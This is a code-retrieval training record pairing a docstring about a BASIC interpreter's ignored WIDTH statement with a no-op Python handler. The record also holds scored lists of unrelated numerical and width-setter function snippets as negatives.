np.array:\n return x**2", "def sq_custom(f,T,a=0,b=0):\n fs=44100\n t=np.linspace(0,T,T*fs)\n A=np.floor(a*fs*T)\n D=np.floor(b*fs*T)\n S1=np.linspace(0,1,A)\n S2=np.ones(T*fs-A-D)\n S3=np.linspace(1,0,D)\n S0=signal.square(2 * np.pi * f * t)\n return(np.hstack((S1,S2,S3))*S0)", "def radio_lumfn(L, _params):\n print _params\n # Number density as a function of sfr, dn/dlog(sfr)\n sfr = L * 5.52e-29 # erg/s/Hz, Bell (2003), Eq. 6\n dndlogsfr_sfms, dndlogsfr_pass = g.sfr_fn(hm, sfr, z=0., params=_params)\n #phi = dndlogsfr_sfms #+ dndlogsfr_pass\n return dndlogsfr_sfms, dndlogsfr_pass", "def newton1d(f, df, ddf, x, niter=10):\n\n x_0 = x\n x_k = x\n\n for i in xrange(niter):\n x_k1 = x_k - df(x_k)/ddf(x_k)\n x_k = x_k1\n\n return x_k", "def basis_fns(n=0):\n return lambda x: np.sum(x ** (n+1), axis=1)", "def diff_fn(\n mu_i: tf.Tensor,\n ddu_n_i: tf.Tensor,\n ddu_t_i: tf.Tensor,\n ) -> tf.Tensor:\n return mu_i * (4.0 / 3.0 * ddu_n_i + 1.0 / 3.0 * ddu_t_i)", "def HFCALC(N, R, Zeta1, Zeta2, Za, Zb, G):\n # Calculate one and two electron integrals\n Intgrl(N, R, Zeta1, Zeta2, Za, Zb)\n # Put all integals into array\n Colect(N, R, Zeta1, Zeta2, Za, Zb)\n # Perform the SCF calculation\n SCF(N, R, Zeta1, Zeta2, Za, Zb, G)\n return", "def chain_2(d2f_dg2, dg_dx, df_dg, d2g_dx2):\r\n return d2f_dg2*(dg_dx**2) + df_dg*d2g_dx2", "def build_quadratic_function(a,b,c):\n return lambda x: a*x**2 + b*x + c", "def ST99(self,dc,nu):\n if len(self.bias_par.keys()) == 0:\n q = 0.707\n p = 0.3\n else:\n q = self.bias_par['q']\n p = self.bias_par['p']\n return 1. + (q*nu**2-1.)/dc + (2.*p/dc)/(1.+(q*nu**2)**p)", "def func(f,c):\n return(f**2+c)", "def get_fnllh(self):\n\n def fnllh(p):\n return 0.5 * anp.sum(self.get_fres()(p) ** 2)\n\n return fnllh", "def f(x):\n return N.sqrt(N.power(N.cos(x),2)+1.0)", "def f(x):\n\treturn np.sin(x / 5.0) * np.exp(x / 10.0) + 5 * np.exp(-x / 2.0)", "def DDG(self, n, e, r, f):\n pre = (-e[:, None] + np.divide.outer((n - 1), r))**2\n pre -= np.divide.outer((n - 1), r**2)\n return pre*f", "def fermi(q_values, nu=None, kt=None):\n if kt is None:\n kt = np.mean(q_values)\n if nu is None:\n nu = np.std(q_values)\n return 1.0/(1 + np.exp((q_values - nu) / kt))", "def intern_F(self):\n if self.A is None:\n def Fx(x,y):\n if self.hx is None:\n fx = self.gradf(x)\n self.Fz = fx, None, None\n return fx, None, None\n else:\n vec_prod = np.zeros(len(x))\n fy = np.zeros(len(y))\n for i in range(len(y)):\n gh = self.gradh[i+1](x,i+1)\n vec_prod += y[i] * gh\n if self.optimized:\n fy[i] = -self.hx[i+1](x, i+1, gh)\n else:\n fy[i] = -self.hx[i+1](x, i+1)\n fx = self.gradf(x)+ vec_prod\n self.Fz = fx, fy, None\n return fx, fy, None\n else:\n def Fx(x,y,u):\n if self.hx is None:\n fx = self.gradf(x)\n fu = self.b-self.A@x\n self.Fz = fx, None, fu\n return fx, None, fu\n else:\n vec_prod = np.zeros(len(x))\n fy = np.zeros(len(y))\n for i in range(len(y)):\n gh = self.gradh[i+1](x,i+1)\n vec_prod += y[i] * gh\n if self.optimized:\n fy[i] = -self.hx[i+1](x, i+1, gh)\n else:\n fy[i] = -self.hx[i+1](x, i+1)\n fx = self.gradf(x)+ vec_prod\n fu = self.b-self.A@x\n self.Fz = fx, fy, fu\n return fx, fy, fu\n return Fx", "def fnu(self, m):\n return 10**(-0.4*(m -23.9))", "def f5(x):\n return 2* sin(x) + sin(2*x)", "def gradfactor(self, f):\r\n raise NotImplementedError", "def f(X_,K_):\r\n return max(exp(X_)-K_,0)", "def DisLayerSN_d(ndf, k):\n d_in = 2**k \n d_out = 2**(k+1)\n\n out = nn.Sequential(nn.utils.spectral_norm(\n nn.Conv2d(ndf*d_in, ndf*d_out, kernel_size, stride=stride, padding=padding, bias=False)), \n nn.Dropout2d(),\n nn.BatchNorm2d(ndf * d_out), \n nn.LeakyReLU(0.2, inplace=True) )\n return out", "def df2dx3_func(self,X):\n result = (\n self.rj*self.rm*self.k_spr*self.b_spr * (\n np.exp(self.b_spr*(self.rm*X[2] - self.rj*X[0]))\n * ((self.rm*X[2] - self.rj*X[0])>=0)\n ) / self.Ij\n )\n return(result)", "def f(x):\n\treturn (sc.log(x**2+5)*sc.cos(0.8*x)+3.5*x)/(sc.e**(x/10))", "def F2K(T_F):\n return 5./9.*(T_F+459.67)", "def shape_function(self, idx, x):\n if idx == 0:\n return (1-x)/2\n elif idx == 1:\n return (1+x)/2\n elif idx == 2:\n return (x**2-1)*sqrt(3./2)/2\n elif idx == 3:\n return (x**2-1)*x*sqrt(5./2)/2\n elif idx == 4:\n return (x**2-1)*(5*x**2-1)*sqrt(7./2)/8\n elif idx == 5:\n return (x**2-1)*(7*x**2-3)*sqrt(9./2)/8\n elif idx == 6:\n return (x**2-1)*(21*x**4-14*x**2+1)*sqrt(11./2)/16\n elif idx == 7:\n return (x**2-1)*(33*x**4-30*x**2+5)*sqrt(13./2)/16\n elif idx == 8:\n return (x**2-1)*(429*x**6-495*x**4+135*x**2-5)*sqrt(15./2)/128\n elif idx == 9:\n return (x**2-1)*(715*x**6-1001*x**4+385*x**2-35)*sqrt(17./2)/128\n elif idx == 10:\n return (x**2-1)*(2431*x**8-4004*x**6+2002*x**4-308*x**2+7)*sqrt(19./2)/256\n raise NotImplementedError(\"Such shape function is not implemented yet (i=%d)\" % i)", "def Eqn(x,b0,b1,b2,b3,b4): \n return b0*np.exp(-0.5*b1**2*(x-b2)**2)*np.cos(b3*(x-b4))", "def nth_derivative(f, x, n):\n h = 10e-2\n out_h = 1/(h**n)\n out = 0\n for k in range(0, n+1):\n out += (-1)**(k+n)*choose(n,k)*f(x +k*h)\n return out_h*out", "def evaluate(x,a,b,c,k1,k2,f1,f2):\n return a * np.sin(k1 * x - f1) + b * np.cos(k2 * x - f2) + c", "def f_np(phi, lambd):\n f = 1. / (np.absolute(1. - sft(phi, lambd)) ** 2)\n return f", "def N_gfun(self,y):\n return 0.0", "def digamma(F):\n def compute(value):\n \"\"\"Return digamma(value)\n \"\"\"\n if isinstance(value, Number):\n if sc is not None:\n return sc.digamma(value, dtype='float32')\n else:\n raise ValueError('Numbers are not supported as input if scipy is not installed')\n return F.npx.digamma(value)\n return compute", "def F(self, (k,t), (j,x), **params):\n return 0.*x", "def make_DL_cp_le_quad_func(n, x_0):\n def quad_func(xi, eta, nodes):\n x = geo.linear_interp(xi, eta, nodes)\n return geo.stresslet_n(x, x_0, n)\n return quad_func", "def simpson(func, start, stop):\n return (func(start) + 4*func((start+stop)/2) + func(stop)) * (stop-start)/6", "def get_basisfunc(self, k, j, knots):\n def basisfunction(u, k=k, j=j, knots=knots):\n \"\"\"\n Method to evaluate the the basis function N^k with index j at point u.\n u (float): the point where to evaluate the basis function\n k (int): the degree of the basis function\n j (int): the index of the basis function we want to evaluate\n knots (array): knot sequence u_i, where i=0,...,K\n \"\"\"\n if k == 0:\n return 1 if knots[j] <= u < knots[j+1] \\\n else 0\n else:\n try:\n a0 = 0 if knots[j+k] == knots[j] \\\n else (u - knots[j])/(knots[j+k]-knots[j])\n a1 = 0 if knots[j+k+1] == knots[j+1] \\\n else (knots[j+k+1] - u)/(knots[j+k+1] - knots[j+1])\n basisfunc = a0 * basisfunction(u, k=k-1) \\\n + a1 * basisfunction(u, k=k-1, j=j+1)\n except IndexError:\n numBasisfunc = len(knots) - 1 - k\n return 'Invalid index. There are no more than {} basis functions for the given problem, choose an ' \\\n 'index lower than the number of basis functions.'.format(numBasisfunc)\n return basisfunc\n return basisfunction", "def f(x):\n return math.exp(-x**2)/(1+x**2)+(2*math.cos(x)**2)/(1+(x-4)**2)", "def simpson2(func, start, stop):\n return (func(start) + 3*func((2*start+stop)/3) + 3*func((start+2*stop)/3) + func(stop)) * (stop-start)/8", "def _fv(self):\n return self.beta * (self.x ** self.c)", "def kf(f, amp, tr_fac, del_fac, t):\n T = 1 / f\n delay = del_fac * T\n tr = tr_fac * T\n beta = 1 - (2 * tr / T)\n\n t_T1 = 0\n t_T2 = (T * (1 - beta) / 4)\n t_T3 = (T * (1 + beta) / 4)\n t_T4 = (T * (3 - beta) / 4)\n t_T5 = (T * (3 + beta) / 4)\n t_T6 = T\n\n t = np.mod(t - delay, T)\n if t_T1 <= t < t_T2:\n f_value = amp * np.sin((2 * np.pi * t) / (T * (1 - beta)))\n elif t_T2 <= t < t_T3:\n f_value = amp\n elif t_T3 <= t < t_T4:\n f_value = amp * np.sin(\n (2 * np.pi * (t - (beta * T / 2))) / (T * (1 - beta)))\n elif t_T4 <= t < t_T5:\n f_value = -amp\n elif t_T5 <= t <= t_T6:\n f_value = amp * np.sin((2 * np.pi * (t - beta * T)) / (T * (1 - beta)))\n return f_value\n # ------------------------------------------\n\n\n # sinusoidal (sinusiodal) function that is continuous in acc", "def get_dissim_func(self, num_itrees):\n self.get_n_random_itrees(num_itrees, self.data.shape[0])\n self.get_node_masses()\n return lambda x1, x2, **kwargs : self.mass_based_dissimilarity(x1, x2)" ]
[ "0.6282961", "0.6064702", "0.59194523", "0.5878748", "0.58671814", "0.5861088", "0.5792502", "0.57803655", "0.5707842", "0.5690402", "0.56867594", "0.5677876", "0.566242", "0.5646247", "0.5644403", "0.56438243", "0.56058556", "0.5597457", "0.5594543", "0.5573553", "0.5563041", "0.5547822", "0.5529641", "0.55270964", "0.55134964", "0.5486521", "0.5448207", "0.544423", "0.54434663", "0.54339707", "0.5422863", "0.5419782", "0.5409645", "0.5409112", "0.5403176", "0.54001695", "0.5387783", "0.53841907", "0.5380699", "0.53765404", "0.5371956", "0.536649", "0.53662807", "0.53634244", "0.53614295", "0.5360938", "0.53539026", "0.53511894", "0.53449565", "0.5344544", "0.53297883", "0.5328778", "0.53220373", "0.5321187", "0.53091484", "0.5301694", "0.52979934", "0.52970654", "0.5295533", "0.52910346", "0.5290825", "0.5273874", "0.5257249", "0.5249992", "0.52347", "0.5234545", "0.52270955", "0.5224642", "0.5222532", "0.5222129", "0.52211577", "0.52190506", "0.52168477", "0.5213832", "0.52075", "0.5207249", "0.52058935", "0.52050817", "0.5202541", "0.52010655", "0.5198552", "0.51962006", "0.5186163", "0.5183545", "0.51815337", "0.5180948", "0.51793617", "0.51773363", "0.5162331", "0.5152677", "0.51493263", "0.5148818", "0.5146332", "0.51455814", "0.51448435", "0.5144818", "0.5143885", "0.5143176", "0.51392984", "0.51375556", "0.5136591" ]
0.0
-1
The WIDTH statement is only for compatibility with some versions of BASIC. It set the width of the screen. Ignored.
def stmt_width(executor, stmt): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def width(self):\n return(self.SCREEN_W)", "def width(self):\n\t\tpass", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def set_width(self, width):\n self.width = width", "def set_width(self, *args):\n return _ida_hexrays.lvar_t_set_width(self, *args)", "def width(self) -> int:", "def width(self) -> int:", "def SetWidth(self, w):\r\n\r\n self._width = w", "def set_window_width(self, width):\n self.device.set_window_width(int(width))\n return \"OK\"", "def set_width(self, width):\n self.__width = width", "def min_width(self):\n ...", "def setWidth(self, *args):\n return _libsbml.Dimensions_setWidth(self, *args)", "def setWidth(self, width):\n if not self._width:\n self._width = int(width)", "def width(self) -> int:\n return self.screen.getmaxyx()[1]", "def screen_width(self):\n # type: () -> int\n return self._screen_width", "def width (self):\n return self._w", "def setWidth(self, width):\n self._reconfig(\"width\", width)", "def width(self, width):\n\n self._width = width", "def width(self, width):\n\n self._width = width", "def width(self, width):\n\n self._width = width", "def width(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"width\")", "def width(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"width\")", "def width(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"width\")", "def get_width(self):\n return \"%s\" % self.width", "def width(self, width):\n if type(width) is not int:\n raise TypeError(\"width must be an integer\")\n if width <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = width", "def width(self, width):\n if type(width) is not int:\n raise TypeError(\"width must be an integer\")\n elif width <= 0:\n raise ValueError(\"width must be > 0\")\n else:\n self.__width = width", "def _get_window_width(self):", "def width(self, width):\n if type(width) is not int:\n raise TypeError(\"width must be an integer\")\n if width is 0 or width < 0:\n raise ValueError(\"width must be > 0\")\n self.__width = width", "def winfo_screenwidth(self):\n return self.width", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self, value):\n self._el._parent.execute_script(\"arguments[0].width = arguments[1]\", self._el, value)\n self.changed = True", "def width(self, value):\n self._el._parent.execute_script(\"arguments[0].width = arguments[1]\", self._el, value)\n self.changed = True", "def getWidth(self) -> int:\n ...", "def port_width(self) -> int:\n pass", "def width(self, value):\n self.integer_validator(\"width\", value)\n self.__width = value", "def screen_width(self, screen_width):\n # type: (int) -> None\n\n if screen_width is not None:\n if not isinstance(screen_width, int):\n raise TypeError(\"Invalid type for `screen_width`, type has to be `int`\")\n\n self._screen_width = screen_width", "def width(self):\n return self['width']", "def opt_width(self, width):\n if width != \"auto\":\n width = int(width)\n self.conf[\"width\"] = width", "def width(self, value):\n self.data_validator(\"width\", value)\n self.__width = value", "def width(cls):\n return cls._width", "def width(self):\n return (self.__width)", "def width(self, w):\n if w < 0:\n w *= -1\n self._width = w", "def width(self, value):\n if type(value) != int:\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value", "def getUserScreenWidth( player ):\n r = player.db.screenWidth\n if r is None:\n r = getClientScreenWidth(player)\n return r", "def width(self, value):\n self.validate_input(width=value)\n self.__width = value", "def getWidth(self):\n return DEFAULT_WIDTH", "def width(self) -> int:\n return self.__width", "def getWidth(self):\n return constants.DEFAULT_WIDTH", "def widths(self):\n return self._widths", "def max_width(self):\n ...", "def width(self):\n # type: () -> float\n return self._width", "def width(self, width):\n self.col += width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self._vim.current.window.width", "def width(self, value):\n if isinstance(value, int) is False:\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value", "def width(self) -> int:\n return self._width", "def set_pixel_width(self, width):\n # set in um\n self._dll.ShamrockSetPixelWidth(self._device, c_float(width))" ]
[ "0.7544066", "0.7302459", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.69712067", "0.69448876", "0.6928398", "0.6928398", "0.6913508", "0.6904323", "0.68787444", "0.68562406", "0.6825356", "0.67942095", "0.67021114", "0.6696766", "0.6687491", "0.6646173", "0.6644446", "0.6644446", "0.6644446", "0.66243577", "0.66243577", "0.66243577", "0.65513694", "0.6522754", "0.65152466", "0.64917463", "0.6484234", "0.64817905", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64669394", "0.64669394", "0.6435798", "0.64160246", "0.6401357", "0.63710916", "0.63673586", "0.63595456", "0.6333893", "0.6325932", "0.63163483", "0.6315539", "0.6314432", "0.63059276", "0.6305175", "0.629886", "0.6297607", "0.6294452", "0.6287179", "0.6278912", "0.62750876", "0.62626314", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62519825", "0.6246505", "0.6241777", "0.6240391" ]
0.0
-1
mode must be "claims" or "channels"
def make_graph(mode, show=True): if mode != "claims" and mode != "channels": return plt.close("all") # Open the DB db_file = "/home/brewer/local/lbry-sdk/lbry/lbryum-data/claims.db" conn = sqlite3.connect(db_file) c = conn.cursor() # List for results times = [] # Query if mode == "claims": x = "<>" else: x = "=" query = "SELECT creation_timestamp FROM claim\ WHERE claim_type {x} 2;".format(x=x) # Iterate over query results i = 0 for t in c.execute(query): times.append(t) i = i + 1 # We can also close the connection if we are done with it. # Just be sure any changes have been committed or they will be lost. conn.close() # Sort the times and convert to a numpy array times = np.sort(np.array(times).flatten()) # Save some stats to JSON for Electron now = time.time() my_dict = {} my_dict["unix_time"] = now my_dict["human_time_utc"] = str(datetime.datetime.utcfromtimestamp(int(now))) + " UTC" my_dict["total_{mode}".format(mode=mode)] = int(\ len(times)) my_dict["new_{mode}_1_hour".format(mode=mode)] = int(\ np.sum(times > (now - 3600.0))) my_dict["new_{mode}_24_hours".format(mode=mode)] = int(\ np.sum(times > (now - 86400.0))) my_dict["new_{mode}_7_days".format(mode=mode)] = int(\ np.sum(times > (now - 7*86400.0))) my_dict["new_{mode}_30_days".format(mode=mode)] = int(\ np.sum(times > (now - 30*86400.0))) f = open("{mode}_stats.json".format(mode=mode), "w") f.write(json.dumps(my_dict)) f.close() # Count new claims this UTC day count_today = np.sum(times > 86400.0*int(now/86400.0)) if mode == "claims": string = "publications" else: string = "channels" print("{K} {mode}, {n} from today so far (UTC). ".format(K=len(times), mode=string, n=count_today), end="", flush=True) # Plotting stuff plt.rcParams["font.family"] = "Liberation Sans" plt.rcParams["font.size"] = 14 plt.style.use("dark_background") plt.rcParams["axes.facecolor"] = "#3c3d3c" plt.rcParams["savefig.facecolor"] = "#3c3d3c" plt.figure(figsize=(15, 11)) plt.subplot(2, 1, 1) times_in_days = (times - 1483228800)/86400.0 days = times_in_days.astype("int64") plt.plot(times_in_days, np.arange(len(times)), "w-", linewidth=1.5) plt.ylabel("Cumulative number of {mode}".format(mode=string)) plt.title("Total number of {mode} = {n}.".format(n=len(times), mode=string)) plt.xlim([0.0, days.max() + 1]) plt.ylim(bottom=-100) plt.gca().tick_params(labelright=True) # Add vertical lines for new years (approximately) new_years = np.arange(0, 5)*365.2425 for year in new_years: plt.axvline(year, color="r", alpha=0.8, linestyle="--") # Add text about years year_names = [2017, 2018, 2019] for i in range(len(year_names)): year = new_years[i] plt.text(year+5.0, 0.95*plt.gca().get_ylim()[1], "{text} begins".format(text=year_names[i]), fontsize=10) # Add line and text about MH's video plt.axvline(890.0, linestyle="dotted", linewidth=2, color="g") plt.text(890.0, 0.2*plt.gca().get_ylim()[1], "@MH video\n\'Why I Left YouTube\'\ngoes viral", fontsize=10) plt.subplot(2, 1, 2) bin_width = 1.0 # Bin edges including right edge of last bin bins = np.arange(0, np.max(days)+2) - 0.5*bin_width color = "#6b95ef" counts = plt.hist(days, bins, alpha=0.9, color=color, label="Raw", width=bin_width, align="mid")[0] # Compute 10-day moving average moving_average = np.zeros(len(bins)-1) for i in range(len(moving_average)): subset = counts[0:(i+1)] if len(subset) >= 10: subset = subset[-10:] moving_average[i] = np.mean(subset) plt.plot(bins[0:-2] + 0.5*bin_width, moving_average[0:-1], "w-", label="10-day moving average", linewidth=1.5) plt.xlim([0.0, days.max() + 1]) plt.xlabel("Time (days since 2017-01-01)") plt.ylabel("New {mode} added each day".format(mode=string)) subset = counts[-31:-1] plt.title("Recent average rate (last 30 days) = {n} {mode} per day.".\ format(n=int(np.sum(time.time() - times <= 30.0*86400.0)/30.0), mode=string)) plt.gca().tick_params(labelright=True) # Year lines for year in new_years: plt.axvline(year, color="r", alpha=0.8, linestyle="--") # MH line plt.axvline(890.0, linestyle="dotted", linewidth=2, color="g") # plt.gca().set_yticks([1.0, 10.0, 100.0, 1000.0, 10000.0]) # plt.gca().set_yticklabels(["1", "10", "100", "1000", "10000"]) plt.legend() plt.savefig("{mode}.svg".format(mode=mode), bbox_inches="tight") plt.savefig("{mode}.png".format(mode=mode), bbox_inches="tight", dpi=70) print("Figure saved to {mode}.svg and {mode}.png.".format(mode=mode)) if show: plt.show()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mode (self, mode) :\r\n self.mode_ = mode", "def set_mode(self, mode):\n\t\tif mode not in (self.MODE_PREVIEW, self.MODE_ANALYZE, self.MODE_SEND):\n\t\t\traise ValueError('mode must be one of the MODE_* constants')\n\t\tself._mode = mode\n\t\tif mode == self.MODE_ANALYZE:\n\t\t\tself.attachment_images = {}", "def handle_fan_mode_received(msg: ReceiveMessage) -> None:\n handle_mode_received(\n msg,\n CONF_FAN_MODE_STATE_TEMPLATE,\n \"_attr_fan_mode\",\n CONF_FAN_MODE_LIST,\n )", "def mode(self) -> Mode:\n ...", "def mode(self, mode: Optional[int] = None) -> Optional[int]:\n ...", "def set_mode(self, mode):\n SetMode_srv = SetModeRequest(0, mode)\n response = self.set_mode_client(SetMode_srv)\n if response.mode_sent:\n rospy.loginfo(CGREEN2 + \"SetMode Was successful\" + CEND)\n return 0\n else:\n rospy.logerr(CRED2 + \"SetMode has failed\" + CEND)\n return -1", "def mode(self, mode_type: str):\r\n self._mode = mode_type.lower()\r\n self.mode_hist.append(mode_type)\r\n\r\n if self.mode_hist[-2] != mode_type and self._daq:\r\n msg = Message(\"mode\", mode_type, self.checksum).message_bytes\r\n self._daq.asynch.transmit(msg)", "def setMode(self, mode):\n self.mode = mode\n if self.mode == 0:\n self.setDrawingMode()\n elif self.mode == 1:\n self.setConstructionMode()\n elif self.mode == 2:\n self.setDisplayMode()\n self.context.text.append(\"mode: \" + self.messages[self.mode])", "def setMode(self,mode):\n self.mode=mode\n if self.mode==0:\n self.setDrawing()\n elif self.mode==1:\n self.setConstruction()\n elif self.mode==2:\n self.setDisplay()\n self.context.text.append(\"mode: \"+self.messages[self.mode])", "def dispatch_mode_for_channel(self, target, mode):\n channel = target[1:]\n assert channel in self.server.channels\n self.server.channels[channel].mode(self, mode)", "def test_mixedModes(self):\n self._sendModeChange(\"+osv\", \"a_user another_user\")\n self._checkModeChange([(True, \"osv\", (\"a_user\", None, \"another_user\"))])\n self._sendModeChange(\"+v-os\", \"a_user another_user\")\n self._checkModeChange(\n [(True, \"v\", (\"a_user\",)), (False, \"os\", (\"another_user\", None))]\n )", "def mode(self, channel, target, command=\"\"):\n time.sleep(1)\n self.s.send(\"MODE %s %s%s\\n\" % (channel, target, (command and (\" \" + command))))\n logger.log(\"MODE %s %s%s\" % (channel, target, (command and (\" \" + command)))).LogSend()", "def test_userMode(self):\n target = self.client.nickname\n # Mode \"o\" on channels is supposed to take a parameter, but since this\n # is not a channel this will not cause an exception.\n self._sendModeChange(\"+o\", target=target)\n self._checkModeChange([(True, \"o\", (None,))], target=target)\n\n def getUserModeParams():\n return [\"Z\", \"\"]\n\n # Introduce our own user mode that takes an argument.\n self.patch(self.client, \"getUserModeParams\", getUserModeParams)\n\n self._sendModeChange(\"+Z\", \"an_arg\", target=target)\n self._checkModeChange([(True, \"Z\", (\"an_arg\",))], target=target)", "def defaultDecoder(self, message, server):\n mode = message.getArg(OPENID_NS, 'mode')\n fmt = \"Unrecognized OpenID mode %r\"\n raise ProtocolError(message, text=fmt % (mode, ))", "def mode(self, mode):\n\n self._mode = mode", "def mode(self, mode):\n\n self._mode = mode", "def mode(self, mode):\n\n self._mode = mode", "def irc_MODE(self, prefix, params):\n user = re.match(self.user_regex, prefix)\n channel = params[0]\n mode = ' '.join(params[1:])\n\n # Sent by network, not a real user\n if not user:\n self.logger.debug(\n \"%s set mode on %s (%s)\" % (prefix, channel, mode)\n )\n return\n\n self.logger.debug(\n \"%s!%s@%s set mode on %s (%s)\" %\n (user.group(1), user.group(2), user.group(3), channel, mode)\n )\n\n # Can get called during connection, in which case EventManager won't be\n # initialized yet\n if self.event_manager:\n self.event_manager.fire(\"irc.mode\", user, channel, mode)", "def mode(self):\r\n pass", "def cmd_mode (self, line):\r\n if line[1] in 'sS':\r\n # f == 'file'\r\n self.respond ('200 MODE S Ok')\r\n else:\r\n self.respond ('502 Unimplemented MODE type')", "def mode_to_network_class(mode):\n if mode in ['flat', 'signals']:\n return FlatPolicy\n elif 'skills' in mode:\n return SkillsPolicy\n elif 'film' in mode:\n return FilmPolicy\n elif mode == 'regression':\n return Regression\n else:\n raise NotImplementedError('mode {} is unknown'.format(mode))", "def is_valid_mode(mode: str) -> bool:\n return mode in (TEST, EASY, HARD)", "def _check_mode_valid(mode):\n if (mode != model_fn.ModeKeys.TRAIN and mode != model_fn.ModeKeys.INFER and\n mode != model_fn.ModeKeys.EVAL):\n raise ValueError(\"mode=%s unrecognized.\" % str(mode))", "def get_mode_parameter(mode):\n if mode == 'job':\n return 'cli'\n elif mode == 'serve':\n return 'serving'\n else:\n return mode", "def __init__(self, mode=0, amp=0., pw=0., period=.001):\n self.mode = mode\n self.amp = amp # uA, range: [0, 24000]. Use amp=0 to stop the channel\n self.period = period # sec, range: [0, 10.23]\n self.pulse_width = pw # sec", "def _sendModeChange(self, msg, args=\"\", target=None):\n if target is None:\n target = \"#chan\"\n message = \":Wolf!~wolf@yok.utu.fi MODE {} {} {}\\r\\n\".format(target, msg, args)\n self.client.dataReceived(message)", "def __check_mode(self):\n self.mode[\"auto_mode\"] = self.communications.get_mode()", "def set_mode(self, mode):\n if mode in self.MODES:\n self.mode = self.MODES[mode]", "def mode(self, mode):\n self.set_mode(mode)", "def _assert_valid_mode(mode:str):\n if not mode in [_TRAIN, _EVAL, _PREDICT]:\n raise ValueError(\"Invalid mode.\")", "def mode(self, target, *data):\n self.send_line('MODE %s %s' % (target, ' '.join(data)), nowait=True)", "def get_speaker_mode_channels(self, mode):\n channels = c_int()\n self._call_fmod(\n \"FMOD_System_GetSpeakerModeChannels\", mode.value, byref(channels)\n )\n return channels.value", "def change_mode(self, mode):\r\n self.update_enrollment(mode=mode)", "def notify_mode_change(self, mode):\n pass", "def set_mode(self, mode):\n print('set_mode', mode)\n self._mode = int(mode)", "def handle_current_mode_received(msg: ReceiveMessage) -> None:\n handle_mode_received(\n msg, CONF_MODE_STATE_TEMPLATE, \"_attr_hvac_mode\", CONF_MODE_LIST\n )", "def cmd_mode(args):", "def set_mode(self, mode):\n if mode == 'train':\n self.net.train()\n elif mode == 'eval':\n self.net.eval()\n else:\n raise ValueError(\n \"Got invalid mode '{}'. Valid options are 'train' and 'eval'.\".format(mode))", "def get_requested_mode(self, request_dict):\r\n if 'audit_mode' in request_dict:\r\n return 'audit'\r\n if 'certificate_mode' and request_dict.get(\"honor-code\"):\r\n return 'honor'\r\n if 'certificate_mode' in request_dict:\r\n return 'verified'", "def mode(self, value):\n self._set_attr('mode', value)", "def set_mode(self, mode='List'):\r\n \r\n #If we choose list mode \r\n if mode.lower() == 'list':\r\n #First choose a list if there was no, otherwise SMA100B is mad\r\n #To know the available list, the query is 'SOUR1:LIST:CAT?'\r\n self.write('SOUR1:LIST:SEL \"/var/user/list1.lsw\"') \r\n \r\n self.write('OUTP1:STAT ON') #Somehow the SMA100B wants the RF to be ON for switching into list mode.\r\n 